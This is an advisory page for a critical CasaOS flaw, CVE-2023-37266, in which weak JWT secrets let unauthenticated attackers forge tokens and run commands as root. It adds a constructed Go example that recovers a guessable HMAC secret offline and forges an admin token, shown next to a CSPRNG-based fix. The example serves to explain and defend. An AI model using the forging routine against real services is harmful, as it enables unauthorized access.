Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tNXE1LThtZnctcDJocs4AA0vD
CasaOS contains weak JWT secrets
Impact
Unauthenticated attackers can craft arbitrary JWTs, access features that usually require authentication, and execute arbitrary commands as root on CasaOS instances.
Patches
The problem was addressed by improving the validation of JWTs in commit 705bf1f. This patch is part of CasaOS 0.4.4.
Workarounds
Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS so that untrusted users cannot reach it, for instance by not exposing it publicly.
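The Impact and Patches sections above describe the bug class without showing the mechanics. The following is an added example written for this page, not CasaOS code and not the content of commit 705bf1f: a minimal HS256 JWT signer and verifier built only from the Go standard library, an attacker routine that recovers a guessable signing secret offline from a single captured token and then forges a token for another identity, and a CSPRNG-based secret generator against which the same attack fails. The secret "casaos", the dictionary, the claim names and all function names are constructed for illustration; the page does not say how the real secret was generated, so the dictionary guess stands in for whatever made the original secret weak.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// b64 is the JWT flavour of base64: URL alphabet, no padding.
var b64 = base64.RawURLEncoding

// signHS256 builds a compact JWS over claims with HMAC-SHA256 under secret.
func signHS256(claims map[string]any, secret []byte) string {
	header := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, _ := json.Marshal(claims) // map keys are sorted, so output is deterministic
	signingInput := header + "." + b64.EncodeToString(body)
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64.EncodeToString(mac.Sum(nil))
}

// verifyHS256 pins the algorithm to HS256, checks the MAC in constant time and
// only then parses the claims. Rejecting any other alg closes the usual
// alg-confusion tricks; it does nothing against a guessable secret.
func verifyHS256(token string, secret []byte) (map[string]any, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	var hdr struct {
		Alg string `json:"alg"`
	}
	rawHdr, err := b64.DecodeString(parts[0])
	if err != nil || json.Unmarshal(rawHdr, &hdr) != nil || hdr.Alg != "HS256" {
		return nil, errors.New("unexpected or unparsable alg")
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil {
		return nil, errors.New("bad signature encoding")
	}
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return nil, errors.New("signature mismatch")
	}
	rawBody, err := b64.DecodeString(parts[1])
	if err != nil {
		return nil, errors.New("bad payload encoding")
	}
	var claims map[string]any
	if err := json.Unmarshal(rawBody, &claims); err != nil {
		return nil, err
	}
	return claims, nil
}

// recoverWeakSecret plays the attacker: with one valid token captured from the
// wire, try each candidate secret offline until the signature verifies.
// No further requests to the server are needed.
func recoverWeakSecret(token string, candidates []string) (string, bool) {
	for _, c := range candidates {
		if _, err := verifyHS256(token, []byte(c)); err == nil {
			return c, true
		}
	}
	return "", false
}

// newStrongSecret draws 32 bytes from the OS CSPRNG. The fix for this bug class
// is an unguessable secret, not merely one that looks random.
func newStrongSecret() ([]byte, error) {
	secret := make([]byte, 32)
	if _, err := rand.Read(secret); err != nil {
		return nil, err
	}
	return secret, nil
}

func main() {
	// Constructed scenario: a server whose signing secret is a guessable string.
	weak := []byte("casaos")
	legit := signHS256(map[string]any{"username": "alice"}, weak)

	// The attacker recovers the secret from a single observed token ...
	dictionary := []string{"secret", "password", "casaos", "admin"}
	found, ok := recoverWeakSecret(legit, dictionary)
	fmt.Println("secret recovered:", ok, found)

	// ... and forges a token for whatever identity the server trusts.
	forged := signHS256(map[string]any{"username": "admin"}, []byte(found))
	claims, err := verifyHS256(forged, weak)
	fmt.Println("forged token accepted as:", claims["username"], err)

	// The same attack against a CSPRNG-generated secret goes nowhere.
	strong, _ := newStrongSecret()
	_, ok = recoverWeakSecret(signHS256(map[string]any{"username": "alice"}, strong), dictionary)
	fmt.Println("secret recovered against strong key:", ok)
}
```

The point the example makes is that signature verification alone, however carefully implemented, cannot compensate for a low-entropy key: once one token has been seen, the secret can be searched offline and every later token is forgeable. When auditing a Go service for this class, look at where the HMAC key comes from (`crypto/rand` versus `math/rand`, a fixed string, or a short derived value) before looking at the verifier.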
Permalink: https://github.com/advisories/GHSA-m5q5-8mfw-p2hr
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNXE1LThtZnctcDJocs4AA0vD
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: about 1 month ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.13534
EPSS Percentile: 0.95579
Identifiers: GHSA-m5q5-8mfw-p2hr, CVE-2023-37266
References:
- https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr
- https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad
- https://nvd.nist.gov/vuln/detail/CVE-2023-37266
- https://pkg.go.dev/vuln/GO-2023-1931
- https://www.sonarsource.com/blog/security-vulnerabilities-in-casaos
- https://github.com/advisories/GHSA-m5q5-8mfw-p2hr
Blast Radius: 0.0
Affected Packages
go:github.com/IceWhaleTech/CasaOS
Dependent packages: 4
Dependent repositories: 1
Downloads:
Affected Version Ranges: < 0.4.4
Fixed in: 0.4.4
All affected versions: 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.1.10, 0.1.11, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.2.9, 0.2.10, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6, 0.3.7, 0.3.8, 0.4.0, 0.4.1, 0.4.2, 0.4.3
All unaffected versions: 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.12, 0.4.13, 0.4.14, 0.4.15